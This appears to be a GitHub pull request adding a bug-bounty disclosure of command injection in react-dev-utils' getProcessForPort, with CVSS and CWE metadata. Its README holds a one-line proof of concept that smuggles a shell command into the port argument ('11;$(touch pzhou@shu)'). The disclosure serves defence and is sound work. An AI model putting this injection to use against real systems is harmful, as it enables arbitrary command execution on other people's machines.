Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Command Injection in react-dev-utils #1962

Merged
merged 2 commits into from
Mar 3, 2021
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
11 changes: 11 additions & 0 deletions bounties/npm/react-dev-utils/1/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
## description
react-dev-utils includes some utilities used by Create React App.

The function getProcessForPort in react-dev-utils is vulnerable to command injection.

## PoC
Create a .js file with the content below and run it, then the file pzhou@shu can be illegally created.

var getProcessForPort = require('react-dev-utils/getProcessForPort');

getProcessForPort('11;$(touch pzhou@shu)');
61 changes: 61 additions & 0 deletions bounties/npm/react-dev-utils/1/vulnerability.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,61 @@
{
"PackageVulnerabilityID": "1",
"DisclosureDate": "2021-03-03",
"AffectedVersionRange": "*",
"Summary": "Command Injection",
"Contributor": {
"Discloser": "834641",
"Fixer": ""
},
"Package": {
"Registry": "npm",
"Name": "react-dev-utils",
"URL": "https://www.npmjs.com/package/react-dev-utils",
"Downloads": "4849977"
},
"CWEs": [
{
"ID": "78",
"Description": "The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."
}
],
"CVSS": {
"Version": "3",
"AV": "N",
"AC": "L",
"PR": "L",
"UI": "N",
"S": "U",
"C": "H",
"I": "H",
"A": "H",
"E": "X",
"RL": "X",
"RC": "X",
"Score": "8.8"
},
"CVEs": [
""
],
"Repository": {
"URL": "https://github.com/facebook/create-react-app/tree/master/packages/react-dev-utils",
"Codebase": [
"JavaScript"
],
"Owner": "facebook",
"Name": "create-react-app",
"Forks": "21400",
"Stars": "86300",
"ForkName": "create-react-app"
},
"Permalinks": [
"https://github.com/facebook/create-react-app/blob/22f46a8d5dfc46fe0f613cd7efbc82344823f461/packages/react-dev-utils/getProcessForPort.js#L28"
],
"References": [
{
"Description": "",
"URL": ""
}
],
"PrNumber": ""
}